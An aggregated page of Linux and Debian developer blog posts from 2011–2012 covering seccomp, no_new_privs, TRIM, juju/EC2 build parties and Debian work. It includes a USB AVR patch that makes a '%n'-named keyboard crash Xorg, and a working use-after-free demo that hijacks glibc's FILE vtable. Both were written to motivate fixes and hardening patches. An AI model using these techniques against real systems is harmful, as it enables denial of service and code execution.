Search Results: "Kees Cook"

16 May 2012

Kees Cook: USB AVR fun

At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to "%n". Recently a Chrome OS developer discovered that renaming his Bluetooth Keyboard to "%n" would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn't a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a normal (USB) keyboard. I borrowed a Maximus USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus. I added a rule for it to udev:
SUBSYSTEM=="usb", ACTION=="add", ATTR idVendor =="03eb", ATTR idProduct =="*", GROUP="plugdev"
installed the AVR tools:
sudo apt-get install dfu-programmer gcc-avr avr-libc
and pulled down the excellent LUFA USB tree:
git clone git://github.com/abcminiuser/lufa-lib.git
After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:
-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
...
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"
In fact, it was so successful that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)
make dfu
After a reboot, I switched it back to programming mode by pressing and holding the H button, pressing and releasing the R button, and then releasing H. The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:
echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default
Be careful of shared internal/external ports, and having two buses on one port, etc.
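As an aside, the underlying bug class is easy to demonstrate in isolation. Here is a minimal sketch of my own (not the Xorg code) showing an attacker-controlled "device name" used as a format string; built with gcc -O2 -D_FORTIFY_SOURCE=2, the %n in a writable format string makes glibc abort the process, which is the same failure mode described above:
#include <stdio.h>
#include <string.h>

int main(void)
{
    /* Hypothetical attacker-controlled device name, copied into
     * writable memory the way a logging path might do. */
    char name[64];
    strcpy(name, "Keyboard (%n%n%n%n)");

    /* Wrong: the untrusted string becomes the format itself.
     * With -D_FORTIFY_SOURCE=2, glibc detects %n in a writable
     * format string and aborts; without fortification this is
     * plain undefined behavior. */
    printf(name);

    /* Right: pass untrusted strings only as arguments. */
    printf("%s\n", name);
    return 0;
}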

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

26 March 2012

Kees Cook: keeping your process unprivileged

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski. If you're not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a leaf node in the process tree, you can call PR_SET_NO_NEW_PRIVS (nnp) to make sure that the current process and its children cannot gain new privileges (like through running a setuid binary). This produces some fun results, since things like the ping tool expect to gain enough privileges to open a raw socket. If you set nnp to 1, suddenly that can't happen any more. Here's a quick example that sets nnp, and tries to run the command line arguments:
#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif
int main(int argc, char * argv[])
{
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
                perror("prctl(NO_NEW_PRIVS)");
                return 1;
        }
        return execvp(argv[1], &argv[1]);
}
When it tries to run ping, the setuid-ness just gets ignored:
$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted
So, if your program has all the privs it's going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

23 March 2012

Kees Cook: seccomp filter now in Ubuntu

With the generous help of the Ubuntu kernel team, Will Drewry's seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly. One of the questions I've been asked by several people while they developed policy for earlier "mode 2" seccomp implementations was "How do I figure out which syscalls my program is going to need?" To help answer this question, and to show a simple use of seccomp filter, I've written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file (seccomp-bpf.h) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet. Read more in the seccomp filter tutorial. Enjoy!
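To give a flavor of what a mode 2 (filter) seccomp program looks like without reproducing the tutorial itself, here is a minimal sketch of my own written directly against the prctl interface (not the tutorial's seccomp-bpf.h helper); it allows only a few syscalls and kills the process on anything else. A real filter should also validate seccomp_data.arch, which this condensed example skips:
#include <stdio.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif

int main(void)
{
    struct sock_filter filter[] = {
        /* Load the syscall number. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                 offsetof(struct seccomp_data, nr)),
        /* Allow write, exit_group and exit... */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit_group, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        /* ...and kill the process on everything else. */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    };
    struct sock_fprog prog = {
        .len = sizeof(filter) / sizeof(filter[0]),
        .filter = filter,
    };

    /* nnp is required so an unprivileged process may install a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("prctl(NO_NEW_PRIVS)");
        return 1;
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) {
        perror("prctl(SECCOMP_MODE_FILTER)");
        return 1;
    }

    /* write(2) is on the allow list; an unlisted syscall here
     * would kill the process with SIGSYS. */
    write(STDOUT_FILENO, "filtered\n", 9);
    return 0;
}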

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

15 February 2012

Kees Cook: discard, hole-punching, and TRIM

Under Linux, there are a number of related features around marking areas of a file, filesystem, or block device as "no longer allocated". In the standard view, here's what happens if you fill a file to 500M and then truncate it to 100M, using the truncate syscall:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details to block device.
The important thing to note here is that in step 3 the block device has no idea about the released data blocks. The original contents of the file are actually still on the device. (To a certain extent, that is why programs like shred exist.) While the recoverability of such released data is a whole other issue, the main problem with this lack of information for the block device is that some devices (like SSDs) could use this information to their benefit to help with extending their life, etc. To support this, the TRIM set of commands was created so that a block device could be informed when blocks were released. Under Linux, this is handled by the block device driver, and what the filesystem can pass down is "discard" intent, which is translated into the needed TRIM commands. So now, when discard notification is enabled for a filesystem (e.g. mount option discard for ext4), the earlier example looks like this:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details and sends discard intent to block device.
While SSDs can use discard to do fancy SSD things, there's another great use for discard, which is to restore sparseness to files. Normally, if you create a sparse file (open, seek to size, close), there was no way, after writing data to this file, to punch a hole back into it. The best that could be done was to just write zeros over the area, but that took up filesystem space. So, the ability to punch holes in files was added via the FALLOC_FL_PUNCH_HOLE option of fallocate. And when discard was enabled for a filesystem, these punched holes would get passed down to the block device as well. Take, for example, a qemu/KVM VM running on a disk image that was built from a sparse file. While inside the VM instance, the disk appears to be 10G. Externally, it might only have actually allocated 600M, since those are the only blocks that had been allocated so far. In the instance, if you wrote 8G worth of temporary data and then deleted it, the underlying sparse file would have ballooned by 8G and stayed ballooned. With discard and hole punching, it's now possible for the filesystem in the VM to issue discards to the block driver, and then qemu could issue hole-punching requests to the sparse file backing the image, and all of that 8G would get freed again. The only downside is that each layer needs to correctly translate the requests into what the next layer needs. With Linux 3.1, dm-crypt supports passing discards from the filesystem above down to the block device under it (though this has cryptographic risks, so it is disabled by default). With Linux 3.2, the loopback block driver supports receiving discards and passing them down as hole-punches. That means that a stack like this works now: ext4, on dm-crypt, on loopback of a sparse file, on ext4, on SSD. If a file is deleted at the top, it'll pass all the way down, discarding allocated blocks all the way to the SSD. Set up a sparse backing file, loopback mount it, and create a dm-crypt device (with allow_discards) on it:
# cd /root
# truncate -s10G test.block
# ls -lk test.block
-rw-r--r-- 1 root root 10485760 Feb 15 12:36 test.block
# du -sk test.block
0       test.block
# DEV=$(losetup -f --show /root/test.block)
# echo $DEV
/dev/loop0
# SIZE=$(blockdev --getsz $DEV)
# echo $SIZE
20971520
# KEY=$(echo -n "my secret passphrase" | sha256sum | awk '{print $1}')
# echo $KEY
a7e845b0854294da9aa743b807cb67b19647c1195ea8120369f3d12c70468f29
# dmsetup create testenc --table "0 $SIZE crypt aes-cbc-essiv:sha256 $KEY 0 $DEV 0 1 allow_discards"
Now build an ext4 filesystem on it (enabling discard during mkfs, and disabling lazy initialization so we can see the final size of the used space on the backing file without waiting for the background initialization at mount time to finish), and mount it with the discard option:
# mkfs.ext4 -E discard,lazy_itable_init=0,lazy_journal_init=0 /dev/mapper/testenc
mke2fs 1.42-WIP (16-Oct-2011)
Discarding device blocks: done
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
655360 inodes, 2621440 blocks
131072 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=2684354560
80 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done 
# mount -o discard /dev/mapper/testenc /mnt
# sync; du -sk test.block
297708  test.block
Now, we create a 200M file, examine the backing file allocation, remove it, and compare the results:
# dd if=/dev/zero of=/mnt/blob bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 9.92789 s, 21.1 MB/s
# sync; du -sk test.block
502524  test.block
# rm /mnt/blob
# sync; du -sk test.block
297720  test.block
Nearly all the space was reclaimed after the file was deleted. Yay! Note that the Linux tmpfs filesystem does not yet support hole punching, so the example above wouldn't work if you tried it in a tmpfs-backed filesystem (e.g. /tmp on many systems).
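For reference, punching a hole from a program is a thin wrapper around fallocate(2). This is a minimal sketch of my own; the file name and offsets are just placeholders for illustration:
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/falloc.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    int fd = open("some-file.img", O_RDWR);  /* hypothetical file */
    if (fd < 0) {
        perror("open");
        return 1;
    }
    /* Punch a 1MB hole starting at offset 4MB. KEEP_SIZE keeps the
     * file length unchanged; only the underlying blocks are freed
     * (and, with -o discard, eventually passed down as discards). */
    if (fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                  4 * 1024 * 1024, 1024 * 1024)) {
        perror("fallocate(FALLOC_FL_PUNCH_HOLE)");
        close(fd);
        return 1;
    }
    close(fd);
    return 0;
}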

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

10 February 2012

Kees Cook: kvm and product_uuid

While looking for something to use as a system-unique fall-back when a TPM is not available, I looked at /sys/devices/virtual/dmi/id/product_uuid (same as dmidecode's "System Information / UUID"), but was disappointed when, under KVM, the file was missing (and running dmidecode crashes KVM *cough*). However, after a quick check, I noticed that KVM supports the -uuid option to set the value of /sys/devices/virtual/dmi/id/product_uuid. Looks like libvirt supports this under capabilities / host / uuid in the XML, too.
host# kvm -uuid 12345678-ABCD-1234-ABCD-1234567890AB ...
host# ssh localhost ...
...
guest# cat /sys/devices/virtual/dmi/id/product_uuid
12345678-ABCD-1234-ABCD-1234567890AB

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

22 January 2012

Kees Cook: fixing vulnerabilities with systemtap

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily: Still, it's a cross-architecture local root escalation on most common installations. Don't stop reading just because you don't have a local user base: attackers can use this to elevate privileges from your user, or from the web server's user, etc. Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you're waiting for your distribution's kernel update, you can use systemtap to change your kernel's running behavior. RedHat suggested this, and here's how to do it in Debian and Ubuntu: In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability. UPDATE: here's a systemtap script from Soren that doesn't require the full debug symbols. Sneaky, but can be rather slow since it hooks all writes in the system. :)
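For the record, the RedHat-style mitigation is a one-liner run in systemtap guru mode; something along these lines (the probe point is quoted from memory, so double-check it against your kernel source before relying on it):
# stap -g -e 'probe kernel.function("mem_write@fs/proc/base.c").call { $count = 0 }'
This form needs the kernel debug symbols installed, which is exactly what Soren's variant mentioned above works around.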

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

16 January 2012

Rapha&#235;l Hertzog: Review of my Debian related goals for 2011

Last year I shared my Debian related goals for 2011. I tend to set more goals than I can reasonably complete alone, and this year was no exception. Let's have a look.
  1. Translate my Debian book into English: PARTLY DONE
    It took more time than expected to prepare and to run the fundraising campaign but it has been successful and the translation is happening right now.
  2. Finish multiarch support in dpkg: DONE BUT NOT ENTIRELY MERGED YET
    Yes, multiarch support was already in the pipe last year in January. I completed the development between January and April (it was sponsored by Linaro) and since then it has mostly been waiting on Guillem to review it, tweak it, and integrate it.
  3. Make deb files use XZ compression by default: TRIED BUT ABANDONED
    After discussing the issue with Colin Watson and Joey Hess during debconf, I came to the conclusion that it was not really desirable at this point. The objections were that debian-installer was not ready for it and that it adds a new dependency on xz for debootstrap to work on non-Debian systems. I believe that the debian-installer side is no longer a problem since unxz is built into busybox-udeb (since version 1:1.19.3-2). For the other side, there's not much to do except ensuring that xz is portable to all the other OSes we care about. DAK has been updated too (see #556407).
  4. Be more reactive to review/merge dpkg patches: PARTLY DONE
    I don't think we had any patch that received zero input. We still have a backlog of patches, and the situation is far from ideal, but it has improved.
  5. Implement the rolling distribution proposed as part of the CUT project and try to improve the release process: NOT DONE
    We had a BoF during debconf, we discussed it at length on debian-devel, but in the end we did nothing with it, except for Josselin Mouette, who wrote a proof of concept for his idea. For me, testing is already what people are expecting from a rolling distribution. It's just a matter of documenting how to effectively use testing, and of some marketing by defining rolling as an alias for testing.
  6. Work more regularly on the developers-reference: PARTLY DONE
    I did contribute some new material to the document but not as much as I could have hoped. On the other hand, I have been rather reactive to ensure that sane patches got merged. We need more people writing new parts and updating the existing content.
  7. Write a 10-lesson course called "Smart Package Management": NOT DONE
  8. Create an information product (most likely an ebook or an online training) and sell it on my blog: NOT DONE
    This was supposed to happen after the translation of the Debian Administrator's Handbook. Since the translation is not yet over, I have not started to work on this yet.
  9. By the end of the year, have at least 1/3 of my time funded by donations and/or earnings of my information products: NOT REACHED
    My target was rather aggressive with 700€ each month, and given that I did not manage to complete any information product, I'm already very pleased to have achieved a mean amount of 204€ in donations each month (min: 91€, max: 364€). It's more than two times better than in 2010. Thank you! Note that those figures do not take into account the revenues of the fundraising for the Debian Administrator's Handbook, since they will be used for its translation.
That makes quite a lot of red (for things that I did not achieve); on the other hand, I completed projects that I did not foresee and did not plan. For instance, improving dpkg-buildflags and then merging Kees Cook's work on hardened build flags was an important step for Debian. This was waiting for so long already.


3 January 2012

Rapha&#235;l Hertzog: My Debian Activities in December 2011

This is my monthly summary of my Debian related activities. If you're among the people who made a donation to support my work (364.18€, thanks everybody!), then you can learn how I spent your money. Otherwise it's just an interesting status update on my various projects.

Dpkg and Multiarch

I had some hope of having a multiarch-enabled dpkg in sid for Christmas, as Guillem told me that it was realistic. Alas, Guillem got sick. We're in January and we're still not there. While some of Guillem's commits in December were related to multi-arch, the size of his pu/multiarch/master branch did not really shrink. We still have 36 commits to merge; most of the work he did was refactoring some parts of the code that were already merged. And he initiated some discussion on interface changes. I participated in those discussions hoping to bring them to a quick resolution. I'm still maintaining my own pu/multiarch/full branch; it is based on Guillem's branch but with further fixes that I developed and that he has not yet merged, and with a change reverted (Guillem's branch allows crossgrading packages between different architectures while dpkg does not manage this correctly yet). I can only hope that January will be the last month of this never-ending saga. It's been one year since I started working on this project. :-(

Misc dpkg work

I reviewed (and later merged) a patch from Kees Cook to enhance dpkg-buildflags so that it can report which hardening features are enabled. This feature might then be used by tools like lintian to detect missing hardening features. I mentored Gianluca Ciccarelli, who is trying to enhance dpkg-maintscript-helper to take care of replacing a directory by a symlink and vice-versa. I took care of #651993 so that dpkg-mergechangelogs doesn't fail when it encounters an invalid version in the changelog, and of #652414 so that dpkg-source --commit accepts a relative filename when a patch file is explicitly given. Guillem also merged a fix I developed for LP#369898.

Packaging work

WordPress 3.3 came out, so I immediately packaged it. Despite my upstream bug report, they did not update their GPL compliance page which offers the corresponding sources for what's bundled in the tarball. So I hunted for the required sources myself, and bundled them in the debian.tar.xz of the Debian source package. It's a rather crude solution, but this allowed me to close the release-critical bug #646729 and to reintroduce the Flash files that were dropped in the past, which is great since the Flash-based file uploader is nicer than the one using the browser's file field. Quilt 0.50 came out after 2 years of (slow) development. The Debian package has many patches and several of them had to be updated to cope with the new upstream release. Fortunately some of them were also merged upstream. It still took an entire morning to complete this update. I also converted the packaging from CDBS to dh with a short rules file. Zim 0.54 came out and I immediately updated the package since it fixed a bug that was annoying me.

Review of the ledgersmb packaging

As the sql-ledger maintainer (and a user of this software for my accounting), I have been hoping to get ledgersmb packaged as a possible replacement for it. I have been following the various efforts initiated over time, but none of them resulted in a real package in Debian. This is a real pity, so I tried to fix this by offering to sponsor package uploads. That's why I did a first review of the packaging. It took several hours, because you have to explain everything that's not good enough. I also filed a wishlist bug against lintian (#652963) to suggest that lintian should detect improper usage of dpkg-statoverride (this is a mistake that was present in the package that I reviewed).

nautilus-dropbox work

I wanted to polish the package in time for the Ubuntu LTS release, and since Debian Import Freeze is in January, I implemented some of the important fixes that I wanted. The Debian package diverges from upstream in that the non-free binaries are installed in /var/lib/dropbox/ instead of $HOME. Due to a bug, the files were not properly root-owned, so I first fixed this (unpacking the tarball as root led to reuse of the embedded user & group information, and that information apparently changed recently on the Dropbox side). Then we recently identified other problems related to proxy handling (see #651065). I fixed this too, because it's relatively frequent that the initial download triggered during the package configuration fails, and in that case it's the user that will re-trigger a package download after having given the appropriate credentials through PackageKit. Without my fix, usage of pkexec would imply the loss of the http_proxy environment variable, and thus it would not be possible for a user to download through a proxy. Last but not least, I reorganized the Debian-specific patches to better separate what can and should be merged upstream from the changes that upstream doesn't want. Unfortunately Dropbox insists on being able to auto-update their non-free binaries; they are, thus, against the installation under /var/lib/dropbox and the corresponding changes.

Book update

We're making decent progress in the translation of the Debian Administrator's Handbook; about 6 chapters are already translated (not yet reviewed though). The liberation campaign is also (slowly) going forward. We're at 67% now (thanks to 90 new supporters!) while we were only at 60% at the start of December.

Thanks

See you next month for a new summary of my activities.


23 December 2011

Kees Cook: abusing the FILE structure

When attacking a process, one interesting target on the heap is the FILE structure used with stream functions (fopen(), fread(), fclose(), etc.) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What's interesting is that this isn't actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have: [figure: glibc FILE vtable location] In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc., could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn't protected the FILE structure in the same way. I'm hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven't overlooked something, since I'd really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :) Here's a quick exploit demonstration in a trivial use-after-free scenario:
#include <stdio.h>
#include <stdlib.h>
void pwn(void)
{
    printf("Dave, my mind is going.\n");
    fflush(stdout);
}
void * funcs[] = {
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
};
int main(int argc, char * argv[])
{
    FILE *fp;
    unsigned char *str;
    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));
    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);
    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r"))) {
        perror("fopen");
        return 1;
    }
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Trigger call to pwn(). */
    fclose(fp);
    return 0;
}
Before the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.
After the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault
Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I'd like to see this fixed too, but it'll require more time to study. :)

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

7 December 2011

Kees Cook: how to throw an EC2 party

Prepare a location to run juju and install it:
mkdir ~/party
cd ~/party
sudo apt-get install juju
Initialize your juju environment. Be sure to add juju-origin: ppa to your environment, along with filling in your access-key and secret-key from your Amazon AWS account. Note that control-bucket and admin-secret should not be used by any other environment, or juju won't be able to distinguish them. Other variables are good to set now too. I wanted my instances close to me, so I set region: us-west-1. I also wanted a 64bit system, so using the AMI list, I chose default-series: oneiric, default-instance-type: m1.large and default-image-id: ami-7b772b3e.
juju
$EDITOR ~/.juju/environments.yaml
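The end result looks roughly like this. This is an illustrative sketch only: the environment name and all of the key values are placeholders, and the exact layout may differ between juju versions, so treat the keys mentioned above as the authoritative list:
environments:
  party:
    type: ec2
    juju-origin: ppa
    access-key: YOUR-AWS-ACCESS-KEY
    secret-key: YOUR-AWS-SECRET-KEY
    control-bucket: juju-party-some-unique-bucket
    admin-secret: some-unique-admin-secret
    region: us-west-1
    default-series: oneiric
    default-instance-type: m1.large
    default-image-id: ami-7b772b3e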
Get my sbuild charm, and configure some types of builders. The salt should be something used only for this party; it is used to generate the random passwords for the builder accounts. The distro and releases can be set to whatever the mk-sbuild tool understands.
bzr co lp:~kees/charm/oneiric/sbuild/trunk sbuild-charm
cat >local.yaml <<EOM
builder-debian:
    salt: some-secret-phrase-for-this-party
    distro: debian
    releases: unstable
builder-ubuntu:
    salt: some-secret-phrase-for-this-party
    distro: ubuntu
    releases: precise,oneiric
EOM
Bootstrap juju and wait for ec2 instance to come up.
juju bootstrap
Before running the status command, you can either accept the SSH key blindly, or use ec2-describe-instances to find the instance and public host name, and use my wait-for-ssh tool to inject the SSH host key into your ~/.ssh/known_hosts file. This requires having set up the environment variables needed by ec2-describe-instances, though.
ec2-describe-instances --region REGION
./sbuild-charm/wait-for-ssh INSTANCE HOST REGION
Get status:
juju status
Deploy a builder:
juju deploy --config local.yaml --repository $PWD local:sbuild-charm builder-debian
Deploy more of the same type:
juju add-unit builder-debian
juju add-unit builder-debian
juju add-unit builder-debian
Now you have to wait for them to finish installing, which will take a while. Once they're at least partially up (the builder user has been created), you can print out the slips of paper to hand out to your party attendees:
./sbuild-charm/slips | mpage -1 > /tmp/slips.ps
ps2pdf /tmp/slips.ps /tmp/slips.pdf
They look like this:
Unit: builder-debian/3
Host: ec2-256-1-1-1.us-west-1.compute.amazonaws.com
SSH key fingerprints:
  1024 3e:f7:66:53:a9:e8:96:c7:27:36:71:ce:2a:cf:65:31 (DSA)
  256 53:a9:e8:96:c7:20:6f:8f:4a:de:b2:a3:b7:6b:34:f7 (ECDSA)
  2048 3b:29:99:20:6f:8f:4a:de:b2:a3:b7:6b:34:bc:7a:e3 (RSA)
Username: builder
Password: 68b329da9893
To admin the machines, you can use juju itself, where N is the machine number from the juju status output:
juju ssh N
To add additional chroots to the entire builder service, add them to the config:
juju set builder-debian releases=unstable,testing,stable
juju set builder-ubuntu releases=precise,oneiric,lucid,natty
Notes about some of the terrible security hacks this charm does: Enjoy!

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

Kees Cook: juju bug fixing

My earlier post on juju described a number of weird glitches I ran into. I got invited by hazmat on IRC (freenode #juju) to try to reproduce the problems so we could isolate the trouble. Fix #1: use the version from the PPA. The juju setup documentation doesn't mention this, but it seems that adding juju-origin: ppa to your ~/.juju/environments.yaml is a good idea. I suggest it be made the default, and to link to the full list of legal syntax for the environments.yaml file. I was not able to reproduce the missing-machines-at-startup problem after doing this, but perhaps it's a hard race to lose. Fix #2: don't use terminate-machine. :P There seems to be a problem around doing the following series of commands: juju remove-unit FOO/N; juju terminate-machine X; juju add-unit FOO. This makes the provisioner go crazy, and leaves all further attempts to add units stuck in pending forever. Big thank you to hazmat and SpamapS for helping debug this.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

6 December 2011

Steve Langasek: Making jam from bugs

This weekend, we held a combined Debian Bug Squashing Party and Ubuntu Local Jam in Portland, OR. A big thank you to PuppetLabs for hosting! Thanks to a brilliant insight from Kees Cook, we were able to give everyone access to their own pre-configured build environment as soon as they walked in the door by deploying schroot/sbuild instances in "the cloud" (in this case, Amazon EC2). Small blips with the mirrors notwithstanding, this worked out pretty well, and let people start to get their hands dirty as soon as they walked in the door instead of spending a lot of time up front doing the boring work of setting up a build environment. This was a big win for people who had never done a package build before, and I highly recommend it for future BSPs. You can read about the build environment setup in the Debian wiki, and details on setting up your own BSP cloud in Kees's blog. (And the cloud instances were running Ubuntu 11.10 guests, with Debian unstable chroots - a perfect pairing for our joint Debian/Ubuntu event!) So how did this curious foray into a combined Ubuntu/Debian event go? Not too shabby: When all was said and done, we didn't get a chance to tackle any wheezy release critical bugs like we'd hoped. That's ok, that leaves us something to do for our next event, which will be bigger and even better than this one. Maybe even big enough to rival one of those crazy, all-weekend BSPs that they have in Germany...

Kees Cook: EC2 instances in support of a BSP

On Sunday, I brought up EC2 instances to support the combined Debian Bug Squashing Party/Ubuntu Local Jam that took place at PuppetLabs in Portland, OR, USA. The intent was to provide each participant with their own sbuild environment on a 64bit machine, since we were going to be working on Multi-Arch support, and having both 64bit and 32bit chroots would be helpful. The host was an Ubuntu 11.10 (Oneiric) instance so it would be possible to do SRU verifications in the cloud too. I was curious about the juju provisioning system, since it has an interesting plugin system, called "charms", that can be used to build out services. I decided to write an sbuild charm, which was pretty straightforward and quite powerful (using this charm it would be possible to trigger the creation of new schroots across all instances at any time, etc). The juju service itself works really well when it works correctly. When something goes wrong, unfortunately, it becomes nearly impossible to debug or fix. Repeatedly while working on charm development, the provisioning system would lose its mind, and I'd have to destroy the entire environment and re-bootstrap to get things running again. I had hoped this wouldn't be the case while I was using it during production on Sunday, but the provisioner broke spectacularly on Sunday too. Due to the fragility of the juju agents, it wasn't possible to restart the provisioner: it lost its mind, the other agents couldn't talk to it any more, etc. I would expect the master services on a cloud instance manager to be extremely robust, since having it die would mean totally losing control of all your instances. On Sunday morning, I started 8 instances. 6 came up perfectly and were excellent work-horses all day at the BSP. 2 never came up. The EC2 instances started, but the service provisioner never noticed them. Adding new units didn't work (instances would start, but no services would notice them), and when I tried to remove the seemingly broken machines, the instance provisioner completely went crazy and started dumping Python traces into the logs (which seems to be related to this bug, though some kind of race condition seems to have confused it much earlier than this total failure), and that was it. We used the instances we had, and I spent 3 hours trying to fix the provisioner, eventually giving up on it. I was very pleased with EC2 and Ubuntu Server itself on the instances. The schroots worked, sbuild worked (though I identified some additional things that the charm should likely do for setup). I think juju has a lot of potential, but I'm surprised at how fragile it is. It didn't help that Amazon had rebooted the entire West Coast the day before and there 